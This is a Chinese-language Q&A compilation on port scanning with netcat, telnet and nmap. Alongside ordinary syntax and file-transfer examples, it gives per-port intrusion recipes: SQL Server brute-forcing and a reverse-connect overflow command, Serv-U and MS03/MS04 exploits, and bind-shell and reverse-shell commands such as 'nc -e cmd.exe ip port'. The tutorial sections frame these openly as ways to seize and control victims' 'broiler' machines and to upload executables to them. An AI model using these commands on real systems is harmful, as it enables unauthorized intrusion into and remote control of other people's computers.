nc服务器如何扫描端口
1. 如何检测远程主机上的某个端口是否开启
操作方法如下:
1.安装telnet。
2.下面开始测试某个端口是否开启。
3.在cmd下输入start /min telnet 192.168.3.422121。
4.会出现一个窗口,是最小化的,等一会,如果窗口自动关闭了,说明端口是关闭的或主机
ping不通。
5.如果端口是开放的,会出现以下画面:
2. 怎么扫描端口啊入侵技术!
各种端口的入侵方法
1. 1433端口入侵
scanport.exe 查有1433的机器
sqlScanPas*.**e 进行字典暴破(字典是关键)
最后 SQLTool*.**e入侵
对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。
nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口
(以上反向的,测试成功)
sqlhelloz.exe 入侵ip 1433 (这个是正向连接)
2. 4899端口入侵
用4899过滤器.exe,扫描空口令的机器
3. 3899的入侵
对很早的机器,可以试试3389的溢出(win3389ex.exe)
对2000的机器,可以试试字典暴破。(tscrack.exe)
4. 80入侵
对sp3以前的机器,可以用webdav入侵;
对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe)
可以利用SQL进行注入。(啊D的注入软件)。
5. serv-u入侵(21端口)
对5. 004及以下系统,可用溢出入侵。(serv5004.exe)
对5.1.0.0及以下系统,可用本地提升权限。(servlocal.exe)
对serv-u的MD5加密密码,可以用字典暴破。(crack.vbs)
输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到密码
6. 554端口
用real554.exe入侵。
7. 6129端口
用DameWare6129.exe入侵。
8. 系统漏洞
利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞,
进行溢出入侵。
9. 3127等端口
可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)。
10. 其他入侵
利用shanlu的入侵软件入侵(WINNTAutoAttack.exe)。
经典IPC$入侵
11.4779端口
s扫描器 加远程控制任我行
3. linux nc命令详解 Linux nc命令怎么用
Linux中nc命令是一个功能强大的网络工具,全称是netcat。
语法:
nc [-hlnruz][-g<网关...>][-G<指向器数目>][-i<延迟秒数>][-o<输出文件>][-p<通信端口>][-s<来源位址>][-v...][-w<超时秒数>][主机名称][通信端口...]
参数说明:
-g<网关> 设置路由器跃程通信网关,最丢哦可设置8个。
-G<指向器数目> 设置来源路由指向器,其数值为4的倍数。
-h 在线帮助。
-i<延迟秒数> 设置时间间隔,以便传送信息及扫描通信端口。
-l 使用监听模式,管控传入的资料。
-n 直接使用IP地址,而不通过域名服务器。
-o<输出文件> 指定文件名称,把往来传输的数据以16进制字码倾倒成该文件保存。
-p<通信端口> 设置本地主机使用的通信端口。
-r 乱数指定本地与远端主机的通信端口。
-s<来源位址> 设置本地主机送出数据包的IP地址。
-u 使用UDP传输协议。
-v 显示指令执行过程。
-w<超时秒数> 设置等待连线的时间。
-z 使用0输入/输出模式,只在扫描通信端口时使用。
实例:
1、TCP端口扫描
# nc -v -z -w2 127.0.0.1 1-100
Connection to 127.0.0.1 22 port [tcp/ssh] succeeded!
Connection to 127.0.0.1 53 port [tcp/domain] succeeded!
Connection to 127.0.0.1 80 port [tcp/http] succeeded!
...
nc: connect to 127.0.0.1 port 100 (tcp) failed: Connection refused
2、从192.168.1.2拷贝文件到192.168.1.3
首先在接收端192.168.1.3上: nc -l 1234 > test.txt
然后在发送端192.168.1.2上: nc 192.168.1.3 < test.txt
注意:先运行接收端,指定一个端口为1234,文件为test.txt,再执行发送端,并且发送端必须存在同名的文件test.txt
3、传输目录
从server1(192.168.16.233)拷贝nginx目录内容到server2(192.168.48.47)上。需要先在server2上,用nc激活监听,
server2上运行:# nc -l 1234 | tar xzv-
server1上运行:# tar czv- nginx | nc 192.168.48.47 1234
4、简单聊天工具
在192.168.1.2上: nc -l 1234
在192.168.1.3上: nc 192.168.1.2 1234
这样,双方就可以相互交流了。使用ctrl+C(或D)退出
4. 如何在服务器上进行端口扫描
看你扫的哪些端口了,如果你扫的445或者1433什么的扫不到的原因可能是,人家屏蔽掉了这几个端口!
5. nc如何使用
一、基本使用
想要连接到某处: nc [-options] hostname port[s] [ports] …
绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
参数:
-e prog 程序重定向,一旦连接,就执行 [危险!!]
-g gateway source-routing hop point[s], up to 8
G num source-routing pointer: 4, 8, 12, …
-I secs 延时的间隔
-l 监听模式,用于入站连接
-n 指定数字的IP地址,不能用hostname
-o file 记录16进制的传输
-p port 本地端口号
-r 任意指定本地及远程端口
-s addr 本地源地址
-t 以telnet的形式应答
-u UDP模式
-v 详细输出——用多个-v可得到更详细的内容
-z 将输入输出关掉——用于扫描时
-w secs timeout的时间
二. 它的简单使用方法
1.nc -l -p 80
监听80端口
2.nc -l -p 80 >c:\log.dat
监听80端口,并把信息记录到log.dat
3.nc -v -l -p 80
监听80端口,并显示端口信息
4.nc -l -p 80 -t -e cmd.exe
监听本地的80端口的入站信息,同时将cmd.exe重定向至80端口,当有人连接的时候,就让cmd.exe以telnet的形式应答
5.nc -v ip port
扫描某ip的某个端口
6.nc -v -z ip port-port
扫描某ip的某端口到某端口
7.nc -v -z -u ip port-port
扫描某ip的某udp端口到某udp端口
7.扫描远程主机
nc -nvv -w2 -z 192.168.x.x 80-445
扫描192.168.x.x的TCP 80到TCP445的所有端口
8.REMOTE主机绑定SHELL
nc -l -p 5354 -t -e c:\winnt\system32\cmd.exe
绑定REMOTE主机的CMDSHELL在REMOTE主机的TCP5354端口
9.REMOTE主机绑定SHELL并反向连接
nc -t -e c:\winnt\system32\cmd.exe 192.168.x.x 5354
绑定REMOTE主机的CMDSHELL并反向连接到192.168.x.x的TCP5354端口
三.使用的例子
1. 计算机192.168.0.1运行:nc -v -n -p 99
计算机192.168.0.8运行:nc -e cmd.exe 192.168.0.1 99
这样我们就获得了192.168.0.8的一个shell
2.计算机192.168.0.1运行:nc -v -n 192.168.0.8 99
计算机192.168.0.8运行:nc -v -l -p 99 >d:\sc.exe
四.高级用法:
1.作攻击程序用
格式1:type c:\exploit.txt|nc -nvv 192.168.x.x 80
格式2:nc -nvv 192.168.x.x 80 < c:\exploit.txt
连接到192.168.x.x的80端口,并在其管道中发送’c:\exploit.txt’的内容(两种格式确有相同的效果, 真是有异曲同工之妙)
2.作蜜罐用
nc -L -p 80 > c:\log.txt
使用’-L’可以不停地监听某一个端口,直到ctrl+c为止,同时把结果输出到’c:\log.txt’中,如果把’>’ 改为’>>’即可以追加日志
3.作蜜罐用
nc -L -p 80 < c:\honeypot.txt
使用’-L’可以不停地监听某一个端口,直到ctrl+c为止,并把’c:\honeypot.txt’的内容’送’入其 管道中
6. nc软件怎么设置可以快速抢占端口
NC.EXE是黑客常用工具。主要用法如下
1)连接到REMOTE主机,例子: 格式:nc -nvv 192.168.x.x 80 讲解:连到192.168.x.x的TCP80端口
2)监听LOCAL主机,例子: 格式:nc -l -p 80 讲解:监听本机的TCP80端口
3)扫描远程主机,例子: 格式:nc -nvv -w2 -z 192.168.x.x 80-445 讲解:扫描192.168.x.x的TCP80到TCP445的所有端口
4)REMOTE主机绑定SHELL,例子: 格式:nc -l -p 5354 -t -e c:\winnt\system32\cmd.exe 讲解:绑定REMOTE主机的CMDSHELL在REMOTE主机的TCP5354端口
5)REMOTE主机绑定SHELL并反向连接,例子: 格式:nc -t -e c:\winnt\system32\cmd.exe 192.168.x.x 5354 讲解:绑定REMOTE主机的CMDSHELL并反向连接到192.168.x.x的TCP5354端口 以上为最基本的几种用法(其实NC的用法还有很多, 当配合管道命令"|"与重定向命令"<"、">"等等命令功能更强大......)。
高级用法:
6)作攻击程序用,例子: 格式1:type.exe c:\exploit.txt|nc -nvv 192.168.x.x 80 格式2:nc-nvv192.168.x.x80讲解:连接到192.168.x.x的80端口,并在其管道中发送'c:\ex ploit.txt'的内容(两种格式确有相同的效果, 真是有异曲同工之妙:P) 附:'c:\exploit.txt'为shellcode等
7. 查看远程服务器的某一端口是否开启
工具/原料
nc
telnet
方法/步骤
1、首先端口分tcp、udp之分,所以同一个端口号还有tcp协议和udp协议之分。
2、最常见的工具是telnet,但是telnet使用的是tcp协议,换句话说telnet只能检测tcp的这个端口打开了没。
8. 如何检测(远程)主机上的某个端口是否开启
1.安装Telnet组件。转到程序控制面板,然后转到打开或关闭窗口功能,Telnet客户端和Telnet服务器勾选,从而安装Telnet组件。
9. 如何扫描某一计算机开放的所有端口
扫描工具如nmap和masscan等,都是对所有端口进行探测发包,并且可回复的就认定为端口开启,如果中间有网络设备,可以作为代理发包或回复,那么也是认为端口开启的。
例如,A扫描B主机,B主机未开放7777端口,但是A和B之间有防火墙代理,可以回复7777端口包,那A所扫描出的结果也是B主机开放了7777端口,要学会甄别。
如何扫描计算机开放端口,可用nmap工具,命令可以参考:nmap -sS -p 1-65535 --open 目标地址,前提是已安装nmap工具,此工具可以在官网免费下载安装。
相同功能的工具还有masscan,此工具不适宜在Windows主机使用,需要在linux主机安装。masscan更倾向于大范围快速扫描,最高支持每秒10万包探测。
(9)nc服务器如何扫描端口扩展阅读:
nmap端口探测工具
nmap是一个网络连接端扫描软件,用来扫描网上电脑开放的网络连接端。确定哪些服务运行在哪些连接端,并且推断计算机运行哪个操作系统(这是亦称 fingerprinting)。
它是网络管理员必用的软件之一,以及用以评估网络系统安全。
正如大多数被用于网络安全的工具,nmap 也是不少黑客及骇客(又称脚本小子)爱用的工具 。
系统管理员可以利用nmap来探测工作环境中未经批准使用的服务器,但是黑客会利用nmap来搜集目标电脑的网络设定,从而计划攻击的方法。
Nmap 常被跟评估系统漏洞软件Nessus混为一谈。Nmap 以隐秘的手法,避开闯入检测系统的监视,并尽可能不影响目标系统的日常操作。
参考来源:网络-nmap
10. NC怎么用啊
NC使用教程
使用动画可以提供给核心成员,菜鸟们也可向我索取
在黑客界混如果不知道什么叫NC的话,那可真是白混了
今天教大家如何来使用NC
讲四个命令
命令1:监听命令
nc -l -p port
nc -l -p port > e:\log.dat
nc -l -v -p port
参数解释:
-l:监听端口,监听入站信息
-p:后跟本地端口号
-v:显示端口的信息,如果使用-vv的话,则会显示端口更详细的信息
提示:一般大家都爱用-vv
nc -l -p 80
这个很简单,监听80端口
如果机器上运行这个命令,端口80被认为是开放的,可以欺骗很多扫描器的哦!
nc -l -p 80 > e:\log.dat
呵呵,功能和上边一样,但是后边加了个“> e:\log.dat”我想,学过ECHO
那个命令的人都会知道吧,是在E盘创建一个log.dat的日志文件
nc -l -v -p 80
和上边命令相似,不过这次不是记录在文件里,而是会直接显示在运行着NC
的屏幕上。
呵呵,讲了这么多,来实践下
nc -l -v -p 80
然后在浏览器中输入本机IP:127.0.0.1
呵呵,看到什么?
同样,上边两个也是一样,大家自己试验一下吧
命令2:程序定向
nc -l -p port -t -e cmd.exe
本地机: nc -l -p port 或 nc -l -v -p port
目标机:nc -e cmd.exe ip port
参数解释:
-l、-p两个参数已经解释过了
-e;作用就是程序定向
-t:以telnet的形式来应答
例子
nc -l -p 5277 -t -e cmd.exe
知道运行在哪里吗?千万不要运行在自己的机器上,如果运行了,你机器
就会变成一台TELNET的服务器了,呵呵,解释一下:监听本地端口5277的
入站信息,同时将CMD.exe这个程序,重定向到端口5277上,当有人连接的时候,就让程序CMD.exe以TELNET的形式来响应连接要求。
说白了,其实就是让他成为一台TELNET的肉鸡,所以这个命令要运行在你的肉鸡上。。(话外音:说这么多遍当我们白痴啊,快往下讲!!!)
呵呵,咱们来找台肉鸡试试,我TELNET IP 5277
HOHO~~如何?
local machine:nc -l -p port ( or nc -l -v -p port )
remote machine:nc -e cmd.exe ip port
大家知道灰鸽子和神偷吧,这两款工具都是利用了反弹端口型的木马,
什么叫反弹端口?就是说,当对方中马后,不用你主动和对方连接,也就是说
不用从你的client端向对方主机上运行的server端发送请求连接,而是对方主动来连接你
这样就可以使很多防火墙失效,因为很多防火墙都不检查出站请求的。
这里这两个命令结合在一起后,于那两款木马可以说有异曲同工之效。为什么?
咳!!听我给你讲啊!!(先交100000000RMB学费)哇,别杀我啊!!)
nc -l -p 5277 (坚听本地5277端口)
同样也可以用
nc -l -v -p 5277
运行在本地
然后在远程机器上,想办法运行
nc -e cmd.exe ip 5277
(你可别真的打“ip”在肉机上啊)要打,xxx.xxx.xxx.xxx这样!!
呵呵,看看在本地机器上出现了什么?
这样就是反弹~~在本地机器上得到了一个SHELL
命令3:扫描端口
nc -v ip port
nc -v -z ip port-port
nc -v -z -u ip port-port
参数解释:
-z:将输入输出关掉,在扫描时使用
nc -v ip port
这个命令是针对某一个端口进行扫描
例如:
nc -v ip 135
扫描远程主机的135端口,这样获得了该端口的一些简单信息,但是针对某些端口,我们还可以获得更多的信息
例如:80端口
我们可以使用nc -v ip 80 然后使用get方法来获得对方的WEB服务器的信息
nc -v -z ip port-port
这个命令是用来扫描的一个命令,这个命令用于快速扫描TCP端口,而port-port则是指定了扫描的端口范围
例如:
nc -v -z ip 1-200
可以看到我机器上的1-200的TCP端口的开放情况
nc -v -z -u ip port-port
这个命令比上个命令多了个-u,这个命令的作用仍然是扫描端口,只是多了一个-u的参数,是用来扫UDP端口的
例如:
nc -v -z -u ip 1-200
这个命令就会扫1-200的UDP端口
命令4:传送文件(HOHO,I LIKE)
LOCAL MACHINE:nc -v -n ip port < x:\svr.exe
REMOTE MACHINE:nc -v -l -p port > y:\svr.exe
参数解释:
-n:指定数字的IP地址
这两个命令结合起来是用来传送文件的
首先,在远程机上运行命令:
nc -v -l -p 5277 > c:\pulist.exe
这个命令还记的吗?呵呵,是不是和监听命令有点类似,对,没错,这个是监听5277端口
并把接受到的信息数据写到c:\pulist.exe中
这时候在本地机上运行
nc -v -n ip 5277 < e:\hack\pulist.exe
这个命令的意思就是,从本地E盘跟目录中读取pulist.exe文件的内容,并把这些数据发送到ip的5277端口上
这样远程主机就会自动创建一个pulist.exe文件。。呵呵,你想到了吗??
上边是NC的比较常用的方法,希望通过这些,大家能发挥自己的想象力,创造出更多更精彩的命令来,
因为NC的用法不仅仅局限于这几种而已哦!!对NC来说,只有想不到,没有做不到的!!!